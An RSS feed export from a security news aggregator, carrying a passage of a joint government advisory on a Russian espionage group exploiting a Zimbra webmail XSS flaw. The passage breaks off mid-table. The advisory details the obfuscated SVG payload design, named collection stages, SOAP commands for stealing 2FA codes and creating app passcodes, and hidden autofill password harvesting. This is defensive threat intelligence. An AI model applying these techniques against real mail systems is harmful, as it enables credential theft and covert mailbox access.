<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=docker+gehrtete+containerimages+kostenlos%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Thu, 30 Jul 2026 11:14:03 +0200</lastBuildDate>
<pubDate>Thu, 30 Jul 2026 11:14:03 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=docker+gehrtete+containerimages+kostenlos%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=docker+gehrtete+containerimages+kostenlos%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Patientensteuerung: KBV warnt vor Chaos durch 90 verschiedene Apps - ad-hoc-news.de]]></title>
<description><![CDATA[Aktuelle Cyber Security Trends jetzt kostenlos ... IT-Sicherheit ohne teure Investitionen stärken und Sicherheitslücken effektiv schließen.]]></description>
<link>https://tsecurity.de/de/3695159/it-security-nachrichten/patientensteuerung-kbv-warnt-vor-chaos-durch-90-verschiedene-apps-ad-hoc-newsde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695159/it-security-nachrichten/patientensteuerung-kbv-warnt-vor-chaos-durch-90-verschiedene-apps-ad-hoc-newsde/</guid>
<pubDate>Sun, 26 Jul 2026 06:46:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Aktuelle <b>Cyber Security</b> Trends jetzt kostenlos ... <b>IT</b>-<b>Sicherheit</b> ohne teure Investitionen stärken und Sicherheitslücken effektiv schließen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite]]></title>
<description><![CDATA[Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite
Executive summary 
A group of Russian state-supported cyber actors has been targeting and compromising various Western government and commercial organizations using the Zimbra Collaboratio...]]></description>
<link>https://tsecurity.de/de/3694430/it-security-nachrichten/russian-state-supported-cyber-actors-conduct-phishing-campaign-targeting-users-of-zimbra-collaboration-suite/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694430/it-security-nachrichten/russian-state-supported-cyber-actors-conduct-phishing-campaign-targeting-users-of-zimbra-collaboration-suite/</guid>
<pubDate>Sat, 25 Jul 2026 18:59:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="c-page-title__buttons"><a class="c-button" href="https://media.defense.gov/2026/Jul/22/2003965244/-1/-1/1/CSA_RUSSIA_PHISHING_TARGET_ZIMBRA.PDF">Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite</a></div>
<h2><strong>Executive summary</strong> </h2>
<p>A group of Russian state-supported cyber actors has been targeting and compromising various Western government and commercial organizations using the Zimbra Collaboration Suite (ZCS) software since at least July 2025. The Russian state-supported advanced persistent threat (APT) group’s activity is tracked in the cybersecurity community under several names (see <a href="https://www.cisa.gov/#cyber1">Cybersecurity industry tracking</a>), primarily as “LAUNDRY BEAR,” a name initially coined by the Netherlands General Intelligence and Security Service (AIVD) and Defence Intelligence and Security Service (MIVD) [<a href="https://www.cisa.gov/#wc1">1</a>].</p>
<p>LAUNDRY BEAR’s targeting is almost certainly to gather sensitive information for the Russian Federation, with these actors primarily focusing on the covert acquisition of email data. Previous campaigns indicated LAUNDRY BEAR relied on unsophisticated initial access techniques—including password spraying, phishing, and pass-the-cookie—allowing the group to successfully run high-volume operations. The latest campaign targeting ZCS uses a novel exploit that was a zero-day vulnerability when first exploited and continues to be successfully exploited. The vulnerability, Common Vulnerabilities and Exposures (CVE) <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a>, was patched in November 2025. This demonstrates LAUNDRY BEAR’s intent and ability to deploy increasingly sophisticated technical capabilities.</p>
<p>Unlike traditional phishing campaigns that persuade a user into taking an action, such as clicking a link or opening a file, LAUNDRY BEAR’s latest campaign leverages a view-based exploit that only requires a user to view a malicious email within a vulnerable version of the webmail service. Once viewed, the exploit attempts to exfiltrate the victim’s last 90 days of email communications, the organization email directory (i.e., Global Address List [GAL]), and other sensitive information to servers controlled by LAUNDRY BEAR. The exploit also attempts to establish persistent access to victim accounts through a variety of means as detailed in the <a href="https://www.cisa.gov/#persistence1">Persistence and credential access</a> section.</p>
<p>This Cybersecurity Advisory (CSA) warns of this ongoing malicious threat activity and urges organizations to update their vulnerable software and implement additional mitigations to thwart these Russian state-supported actors’ continued success. The CSA is being released by the following authoring and co-sealing agencies:</p>
<ul>
<li>United States National Security Agency (NSA)</li>
<li>United States Federal Bureau of Investigation (FBI)</li>
<li>Netherlands Defence Intelligence and Security Service (MIVD)</li>
<li>Netherlands General Intelligence and Security Service (AIVD)</li>
<li>United States Cybersecurity and Infrastructure Security Agency (CISA)</li>
<li>United States Defense Counterintelligence and Security Agency (DCSA)</li>
<li>United States Department of Defense Cyber Crime Center (DC3)</li>
<li>United States Department of the Treasury</li>
<li>United States Naval Criminal Investigative Service (NCIS)</li>
<li>Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)</li>
<li>Communications Security Establishment Canada’s (CSE’s) Canadian Centre for Cyber Security (Cyber Centre)</li>
<li>New Zealand National Cyber Security Centre (NCSC-NZ)</li>
<li>United Kingdom National Cyber Security Centre (NCSC-UK)</li>
<li>Czech Republic National Cyber and Information Security Agency (NÚKIB)<a href="https://www.cisa.gov/#f1"><sup>1</sup></a></li>
<li>Danish Defence Intelligence Service (DDIS)<a href="https://www.cisa.gov/#f2"><sup>2</sup></a></li>
<li>Estonian Foreign Intelligence Service (EFIS)<a href="https://www.cisa.gov/#f3"><sup>3</sup></a></li>
<li>Finnish Defence Intelligence (FDI)<a href="https://www.cisa.gov/#f4"><sup>4</sup></a></li>
<li>Finnish Security and Intelligence Service (SUPO)<a href="https://www.cisa.gov/#f5"><sup>5</sup></a></li>
<li>French General Directorate for Internal Security (DGSI)<a href="https://www.cisa.gov/#f6"><sup>6</sup></a></li>
<li>French National Cybersecurity Agency (ANSSI)<a href="https://www.cisa.gov/#f7"><sup>7</sup></a></li>
<li>Italian External Intelligence and Security Agency (AISE)<a href="https://www.cisa.gov/#f8"><sup>8</sup></a></li>
<li>Italian Internal Intelligence and Security Agency (AISI)<a href="https://www.cisa.gov/#f9"><sup>9</sup></a></li>
<li>Security and Intelligence Service of the Republic of Moldova (SIS RM)<a href="https://www.cisa.gov/#f10"><sup>10</sup></a></li>
<li>Polish Foreign Intelligence Agency (AW)<a href="https://www.cisa.gov/#f11"><sup>11</sup></a></li>
<li>The Military Counterintelligence Service of Poland (SKW)<a href="https://www.cisa.gov/#f12"><sup>12</sup></a></li>
<li>Spain National Intelligence Centre (CNI)<a href="https://www.cisa.gov/#f13"><sup>13</sup></a></li>
<li>Sweden National Cyber Security Centre (NCSC-SE)<a href="https://www.cisa.gov/#f14"><sup>14</sup></a></li>
</ul>
<p>The authoring agencies urge any organizations using ZCS to implement the recommendations listed within the <a href="https://www.cisa.gov/#mitigations1">Mitigations</a> section of this advisory to reduce the risk associated with this activity. This CSA also includes specific remediations for organizations to implement if they discover the presence of the listed <a href="https://www.cisa.gov/#ioc1">Indicators of compromise</a> (IOCs).  </p>
<p>As more organizations update their ZCS software based on this CSA, LAUNDRY BEAR may discontinue the current campaign exploiting this vulnerability; however, based on the success of this and previous campaigns, it is very likely that the group will continue to target ZCS and other email systems used by organizations in Western countries. The actors will almost certainly continue to rely on email to engage potential victims by exploiting novel vulnerabilities and, when necessary, use social engineering techniques to assist with their efforts. The authoring agencies recommend organizations regularly update their mail service software and continuously monitor their email systems and emails for malicious activity.</p>
<p>For a downloadable list of IOCs, see:</p>
<ul>
<li><a href="https://www.cisa.gov/sites/default/files/2026-07/AA26-204A.stix_.xml">AA26-204A.stix.xml</a> (STIX XML)</li>
<li><a href="https://www.cisa.gov/sites/default/files/2026-07/AA26-204A.stix_.json">AA26-204A.stix.json</a> (STIX JSON)</li>
</ul>
<h2><strong>Cybersecurity industry tracking</strong><a class="ck-anchor"></a></h2>
<p>The cybersecurity industry provides overlapping cyber threat intelligence, indicators of compromise (IOCs), and mitigation recommendations related to these Russian state-supported cyber actors. While not exhaustive, the following are threat group names commonly used for these actors within the cybersecurity community:</p>
<ul>
<li>LAUNDRY BEAR</li>
<li>Void Blizzard [<a href="https://www.cisa.gov/#wc2">2</a>]</li>
<li>CL-STA-1114 [<a href="https://www.cisa.gov/#wc3">3</a>]</li>
<li>TA488 (formerly UNK_PitStop) [<a href="https://www.cisa.gov/#wc4">4</a>]</li>
</ul>
<p><strong>Note:</strong> Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the U.S. government’s understanding for all activity related to these groupings.</p>
<h2><strong>Background</strong></h2>
<p>Public advisories from Netherlands General Intelligence and Security Service (AIVD), Netherlands Defence Intelligence and Security Service (MIVD), and Microsoft highlighted these Russian state-supported advanced persistent threat (APT) actors in May 2025, calling them LAUNDRY BEAR and Void Blizzard respectively [<a href="https://www.cisa.gov/#wc1">1</a>] [<a href="https://www.cisa.gov/#wc2">2</a>]. Both advisories assessed that the group was engaged in malicious cyber activity as early as April 2024.  </p>
<p>The May 2025 advisories highlighted a cluster of activity targeting cloud-based email environments, including Microsoft Exchange in particular, and abusing legitimate APIs to perform data exfiltration in bulk [<a href="https://attack.mitre.org/versions/v19/techniques/T1114/002/" target="_blank">T1114.002</a>]. The group relied on unsophisticated means of initial access, including procuring stolen credentials on criminal marketplaces [<a href="https://attack.mitre.org/versions/v19/techniques/T1078/" target="_blank">T1078</a>], and using social engineering techniques to lure targets into interacting with a malicious site masquerading as a legitimate one. As of April 2025, one of these sites resembled a European Defence &amp; Security Summit registration portal that required registrants to sign in to their Microsoft account to view. Once a user entered their Microsoft credentials into this malicious site, LAUNDRY BEAR’s modified version of the open source adversary emulation toolkit, Evilginx, intercepted the user’s credentials. LAUNDRY BEAR then used this authentication data, including passwords and session tokens, to access the compromised account and conduct mass email exfiltration, as well as harvest other information. This method of compromise is commonly known as an adversary-in-the-middle (AiTM) technique [<a href="https://attack.mitre.org/versions/v19/techniques/T1557/" target="_blank">T1557</a>].  </p>
<p>Beginning around July 2025, LAUNDRY BEAR shifted toward a more technical method of email compromise, highlighting their continued efforts to covertly acquire email communications from a variety of Western organizations of interest and deliver them to the Russian Federation. Using a custom-developed capability [<a href="https://attack.mitre.org/versions/v19/techniques/T1587/001/" target="_blank">T1587.001</a>] named “<em>Улей</em>” or “<em>Ulej</em>” (Russian for beehive), LAUNDRY BEAR successfully targeted and exfiltrated sensitive user information from organizations who use the Zimbra Collaboration Suite (ZCS) product [<a href="https://attack.mitre.org/versions/v19/techniques/T1114/" target="_blank">T1114</a>]. Data LAUNDRY BEAR attempted to exfiltrate from compromised accounts included:</p>
<ul>
<li>Last 90 days of emails,</li>
<li>Email address,</li>
<li>Password [<a href="https://attack.mitre.org/versions/v19/techniques/T1589/001/" target="_blank">T1589.001</a>],</li>
<li>Global Address List (GAL) [<a href="https://attack.mitre.org/versions/v19/techniques/T1087/" target="_blank">T1087</a>],</li>
<li>Two-factor authentication (2FA) tokens, and</li>
<li>Newly-created Application Passcode [<a href="https://attack.mitre.org/versions/v19/techniques/T1098/" target="_blank">T1098</a>].</li>
</ul>
<p>The covert and persistent nature of this activity, along with the absence of any known financial extortion, almost certainly indicates this group’s involvement in espionage activities with Russian government backing. Additionally, extensive Ukrainian targeting, prior to use against U.S. and other NATO allies, outlines an increasing trend within Russian cyber threat groups to target Ukrainian users first—both as a priority target and as a testbench for malicious cyber techniques before broader global deployment.</p>
<h2><strong>Targeting details</strong></h2>
<p>LAUNDRY BEAR has targeted and compromised users in various organizations, including those associated with:</p>
<ul>
<li>the Defense Industrial Base (DIB),  </li>
<li>the federal and local government,</li>
<li>education,</li>
<li>energy,</li>
<li>law enforcement,  </li>
<li>media,  </li>
<li>non-governmental organizations, and</li>
<li>technology.</li>
</ul>
<h2><strong>Technical details</strong></h2>
<p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v19/matrices/enterprise/" target="_blank">MITRE ATT&amp;CK® Matrix for Enterprise</a> framework, version 19. This advisory also uses <a href="https://d3fend.mitre.org/" target="_blank">MITRE D3FEND<sup>TM</sup></a> version 1.4.0<a href="https://www.cisa.gov/#f15"><sup>15</sup></a>. See <a href="https://www.cisa.gov/#appendixa">Appendix A</a> and <a href="https://www.cisa.gov/#appendixb">Appendix B</a> for tables of the activity mapped to MITRE ATT&amp;CK and D3FEND tactics, techniques, and countermeasures.</p>
<p><em>Ulej </em>is a novel data exfiltration and aggregation capability, that currently (as of the publication of this report) supports a campaign specifically targeting users of ZCS webmail servers. This capability is used to exploit <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a> [Common Weakness Enumeration (CWE) <a href="https://cwe.mitre.org/data/definitions/79.html" target="_blank">CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'</a>)], but likely could be adapted to exploit other vulnerabilities. It exfiltrates emails and other sensitive user data from a victim’s system immediately after exploitation and stores the data in an actor-controlled unattributable virtual private server (VPS) [<a href="https://attack.mitre.org/versions/v19/techniques/T1074/002/" target="_blank">T1074.002</a>] running LAUNDRY BEAR’s “Flowerbed” collection framework. The collected data is almost certainly further exfiltrated to internal network resources for review and long-term retention.</p>
<h3><em><strong>Reconnaissance</strong></em></h3>
<p>LAUNDRY BEAR uses the <em>Ulej </em>capability to exploit the <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a> vulnerability in organizations using ZCS. This campaign’s targeted victimology and limited exploitation capabilities likely indicate this group manually identifies and targets the victim organizations. LAUNDRY BEAR likely identifies organizations with public-facing Zimbra infrastructure by port scanning [<a href="https://attack.mitre.org/versions/v19/techniques/T1595/" target="_blank">T1595</a>] and fingerprinting datasets easily procured through various commercial vendors [<a href="https://attack.mitre.org/versions/v19/techniques/T1596/005/" target="_blank">T1596.005</a>].  </p>
<p>After identifying a target organization, the group likely compiles email addresses for individual users to target with the exploit [<a href="https://attack.mitre.org/versions/v19/techniques/T1589/002/" target="_blank">T1589.002</a>] from datasets offered by commercial vendors [<a href="https://attack.mitre.org/versions/v19/techniques/T1597/002/" target="_blank">T1597.002</a>], open source intelligence [<a href="https://attack.mitre.org/versions/v19/techniques/T1593/" target="_blank">T1593</a>], or previously exfiltrated data [<a href="https://attack.mitre.org/versions/v19/techniques/T1597/" target="_blank">T1597</a>].  </p>
<h3><em><strong>Resource development </strong></em><a class="ck-anchor"></a></h3>
<p>The actors procure VPSs from a variety of providers [<a href="https://attack.mitre.org/versions/v19/techniques/T1583/003/" target="_blank">T1583.003</a>], including those with Know Your Customer (KYC) requirements, and often use fabricated identities. LAUNDRY BEAR primarily uses Mullvad VPN [<a href="https://attack.mitre.org/versions/v19/techniques/T1583/">T1583</a>] when interacting with these servers, further demonstrating the group’s intent to mask their identity and maintain operations security (OPSEC). After the server is provisioned, an automated process deploys the Docker containers necessary for <em>Ulej’s</em> Flowerbed framework [<a href="https://attack.mitre.org/versions/v19/techniques/T1608/">T1608</a>], which then receives and aggregates the data <em>Ulej</em> exfiltrates. These servers are typically only used for 7-60 days before moving to new infrastructure.</p>
<h4><strong>Flowerbed framework</strong></h4>
<p>Flowerbed is a Python project that uses Docker for containerization. The project includes four different Docker containers:</p>
<ul>
<li>Catcher,</li>
<li>Certbot,</li>
<li>Nginx, and</li>
<li>Gardener.</li>
</ul>
<p>Catcher acts as both a DNS and HTTP server to receive and aggregate exfiltrated victim information [<a href="https://attack.mitre.org/versions/v19/techniques/T1048/">T1048</a>]. For additional information on Catcher, refer to the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section of this advisory. Flowerbed’s next container, Certbot, is based on one of the official Certbot containers, which allows for automated generation of Let’s Encrypt certificates using DNS challenges through Cloudflare. This certificate can then be used by the Nginx container, which serves as an HTTPS reverse proxy for Catcher, enabling Flowerbed to disguise some of its exfiltration activity through an encrypted communications channel [<a href="https://attack.mitre.org/versions/v19/techniques/T1048/002/" target="_blank">T1048.002</a>]. The Nginx reverse proxy also validates that the Server Name Indicator (SNI) value contains “*.i.*” prior to forwarding the traffic to Catcher. If the SNI does not contain that string, the Nginx server returns a 444 error to the client. This is likely an attempt to reject non-Ulej connections. Finally, the Gardener container functions as a health check for the Catcher service. Gardener is a simple Python script that validates Catcher correctly receives and processes data.</p>
<p>The simplistic Flowerbed codebase has indications that artificial intelligence (AI) played a role in its development. This highlights how AI is increasingly being used to develop malicious capabilities [<a href="https://attack.mitre.org/versions/v19/techniques/T1588/007/" target="_blank">T1588.007</a>]. The dependence on AI for a simple capability, such as Flowerbed, alongside a previous reliance on open source capabilities, such as Evilginx2 [<a href="https://attack.mitre.org/versions/v19/techniques/T1588/002/" target="_blank">T1588.002</a>], likely indicates a lack of advanced technical knowledge within LAUNDRY BEAR, especially in relation to true software development capabilities.</p>
<h3><em><strong>Initial access</strong></em></h3>
<p>To gain initial access, LAUNDRY BEAR sends an email containing a malicious JavaScript payload to the target [<a href="https://attack.mitre.org/versions/v19/techniques/T1566/" target="_blank">T1566</a>]. Through exploitation of <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a>, this JavaScript payload is immediately executed once the user views the malicious email [<a href="https://attack.mitre.org/versions/v19/techniques/T1203/" target="_blank">T1203</a>], such as the one shown in <a href="https://www.cisa.gov/#figure1"><strong>Figure 1</strong></a>, in the ZCS webmail platform. Since at least November 2025, LAUNDRY BEAR began sending these phishing emails from victim infrastructure through compromised accounts [<a href="https://attack.mitre.org/versions/v19/techniques/T1199/" target="_blank">T1199</a>], as shown in the email metadata in <a href="https://www.cisa.gov/#figure2"><strong>Figure 2</strong></a>. These compromised accounts were likely previous victims of this, or another LAUNDRY BEAR, campaign and their use is intended to further obfuscate and frustrate anti-phishing tools and training.</p>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure1.png?itok=yrzcl7tK" width="604" height="235" alt="Figure 1: Example of malicious email">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 1: Example of malicious email</strong></em></figcaption>
  </figure>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure2.png?itok=vEulmmyx" width="604" height="102" alt="Figure 2: Headers from an example malicious email">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 2: Headers from an example malicious email</strong></em></figcaption>
  </figure>
<p>According to the National Vulnerability Database (NVD), <a href="https://nvd.nist.gov/vuln/detail/CVE-2025-66376" target="_blank">CVE-2025-66376</a> was initially published on 5 January 2026. This vulnerability allows for execution of a JavaScript payload included in email content due to improper sanitization of Cascading Style Sheet’s (CSS) @import directives within an email [<a href="https://www.cisa.gov/#wc5">5</a>]. Because the activity attributed to this campaign began in July 2025—months before Synacor released a patch and the CVE was published—the payload initially exploited a zero-day vulnerability at that time [<a href="https://attack.mitre.org/versions/v19/techniques/T1587/004/" target="_blank">T1587.004</a>].  </p>
<p><strong>Utilization of a zero-day exploit within this campaign demonstrates the ability for even emerging threat groups like LAUNDRY BEAR to operationalize novel exploits into a highly successful capability.</strong></p>
<p>Hidden in LAUNDRY BEAR’s email is a Base64 encoded payload within the “onload” field of a Scalable Vector Graphics (SVG) element [<a href="https://attack.mitre.org/versions/v19/techniques/T1027/017/" target="_blank">T1027.017</a>], as shown in <a href="https://www.cisa.gov/#figure3"><strong>Figure 3</strong></a>. Leading up to the inclusion of this payload in the SVG element are various instances of @import directives, as required to leverage <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376">CVE-2025-66376</a>. This payload includes an XOR encrypted final script encoded in a Base64 inner payload (see <a href="https://www.cisa.gov/#figure3"><strong>Figure 3</strong></a>) [<a href="https://attack.mitre.org/versions/v19/techniques/T1027/013/" target="_blank">T1027.013</a>]. The outer payload decodes and decrypts the inner payload using an XOR function and a hardcoded key and then executes the script contained within the inner payload containing the collection and exfiltration logic. By changing the key used for the XOR encryption of the inner payload or adding additional @import directives with non-functional code [<a href="https://attack.mitre.org/versions/v19/techniques/T1027/010/" target="_blank">T1027.010</a>], LAUNDRY BEAR can easily generate new payloads that bypass basic threat detection signatures. This malicious payload attempts to collect and exfiltrate information in 12 asynchronous stages [<a href="https://attack.mitre.org/versions/v19/techniques/T1119/">T1119</a>]. The stages in order of appearance within the payload are as follows:</p>
<ol>
<li>sendStartPing,</li>
<li>gather_email,</li>
<li>gather_environment,</li>
<li>gather_2fa_codes,</li>
<li>gather_app_password,</li>
<li>gather_device_status,</li>
<li>gather_oauth_consumers,</li>
<li>gather_autocomplete_password,</li>
<li>enable_mail_protocols,</li>
<li>gather_gal,</li>
<li>sendArchives, and</li>
<li>sendFinishPing. </li>
</ol>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure3_0.png?itok=M-bj5-nb" width="607" height="577" alt="Figure 3: Malicious payload of example email">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 3: Malicious payload of example email</strong></em></figcaption>
  </figure>
<p>Use of a zero-day exploit within this campaign demonstrates the ability for even emerging threat groups like LAUNDRY BEAR to operationalize novel exploits into a highly successful capability [<a href="https://attack.mitre.org/versions/v19/techniques/T1587/" target="_blank">T1587</a>].</p>
<h3><em><strong>Persistence and credential access</strong></em><a class="ck-anchor"></a></h3>
<p>To establish sustained persistence into the victim’s email account, the script attempts to modify account preferences and collect authentication information. Any collected credentials are later exfiltrated, as further described in the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section below. Other campaigns attributed to LAUNDRY BEAR also demonstrated the group’s ability to circumvent multi-factor authentication through session token replay [<a href="https://attack.mitre.org/versions/v19/techniques/T1550/004/" target="_blank">T1550.004</a>], and the Zimbra campaign follows a similar trend.</p>
<p>The script used in this campaign tries to discover the victim’s email address during the <em>gather_email</em> stage [<a href="https://attack.mitre.org/techniques/T1087/" target="_blank">T1087</a>]. The script searches for this email address in two ways. First, it examines the <em>batchInfoResponse </em>variable, which an HTML script element on the webpage can define, for an email address. Even if the script finds an email address there, it also checks whether it acquired a Cross-Site Request Forgery (CSRF) token as described later in the <a href="https://www.cisa.gov/#collection1">Collection</a> section of this advisory. If so, the script uses the “GetIdentitiesRequest” Simple Object Access Protocol (SOAP) command under the “ZimbraAccount” namespace to determine the victim’s email address [<a href="https://attack.mitre.org/versions/v19/techniques/T1185/" target="_blank">T1185</a>] and then exfiltrates it. However, if the script does not have a CSRF token or the SOAP request fails, the script exfiltrates the email value recovered from the first method instead. If both attempts fail to capture the victim’s email, the script sends a JavaScript Object Notation (JSON) payload with a key of “email” and value of <em>null </em>over HTTPS and does not attempt DNS exfiltration.</p>
<p>During the <em>gather_autocomplete_password</em> stage, the script attempts to collect the victim’s saved password via the autocomplete feature of the victim’s password manager. The script injects two HTML div elements requesting login credentials onto the page outside of the victim’s view, as shown in <a href="https://www.cisa.gov/#figure4"><strong>Figure 4</strong></a><strong> </strong>and <a href="https://www.cisa.gov/#figure5"><strong>Figure 5</strong></a>. After waiting five seconds, the script then attempts to extract the password provided automatically by the password manager from the input element shown in <a href="https://www.cisa.gov/#figure4"><strong>Figure 4</strong></a>. If there is no value in that input field, it checks the password input field shown in <a href="https://www.cisa.gov/#figure5"><strong>Figure 5</strong></a>. If neither input field contains a value, a JSON payload with a key of “autocomplete_password” and value of <em>null </em>is sent over HTTPS and DNS exfiltration is not attempted.</p>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure4.png?itok=ZOZ8JHZC" width="1024" height="188" alt="Figure 4: First illegitimate login HTML element">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 4: First illegitimate login HTML element</strong></em></figcaption>
  </figure>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure5.png?itok=8xZU_GCa" width="1024" height="115" alt="Figure 5: Second illegitimate login HTML element">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 5: Second illegitimate login HTML element</strong></em></figcaption>
  </figure>
<p>LAUNDRY BEAR almost certainly relies on a mail client using the Internet Message Access Protocol (IMAP) for persistent access to the victim’s mailbox. During the <em>enable_mail_protocols</em> stage, a SOAP request leveraging the “ModifyPrefsRequest” command under the “ZimbraAccount” namespace is sent. This request attempts to set the “zimbraPrefImapEnabled” preference to TRUE. While the default setting for “zimbraPrefImapEnabled” is not well documented, this action is almost certainly intended to ensure that IMAP access to the victim’s mailbox is enabled.</p>
<p>ZCS does not support 2FA for some mail clients, including IMAP. To support users who rely on IMAP clients, ZCS allows for the generation of Application Passcodes. Application Passcodes are randomly generated passwords that can be used for clients that cannot support the normal 2FA process to authenticate. During the <em>gather_app_password</em> stage, the script makes a SOAP request using the “CreateAppSpecificPasswordRequest” command under the “ZimbraAccount” namespace to create a new Application Passcode [<a href="https://attack.mitre.org/versions/v19/techniques/T1556/006/" target="_blank">T1556.006</a>]. The SOAP request uses “ZimbraWeb” as the name of the application.</p>
<p>Additionally, the script also attempts to collect 2FA tokens. During the <em>gather_2fa_codes</em> stage, the script makes a SOAP request using the “GetScratchCodesRequest” command under the “ZimbraAccount” namespace. The script then attempts to exfiltrate any non-null 2FA codes collected this way. The number of codes can vary, and each code is exfiltrated to Flowerbed individually.</p>
<h3><em><strong>Collection</strong></em><a class="ck-anchor"></a></h3>
<p>As demonstrated in the <a href="https://www.cisa.gov/#persistence1">Persistence and credential access</a> section, this script relies heavily on SOAP requests to collect victim information. To make these requests, the script aims to acquire the victim’s current CSRF token, which it attempts to access within the webpage’s local storage using localStorage.getItem("csrfToken"). If the script is unable to acquire this CSRF token, it will be unable to make any SOAP requests. In addition to the SOAP commands documented in the <a href="https://www.cisa.gov/#persistence1">Persistence and credential access</a> section, other SOAP commands executed to collect victim information are shown in <a href="https://www.cisa.gov/#table1"><strong>Table 1</strong></a>.</p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 1: Additional SOAP commands used</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p><strong>SOAP Command </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p><strong>Namespace </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p><strong>Stage </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>GetInfoRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>zimbraAccount </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>GetDeviceStatusRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>zimbraSync </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>gather_device_status </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>GetOAuthConsumersRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
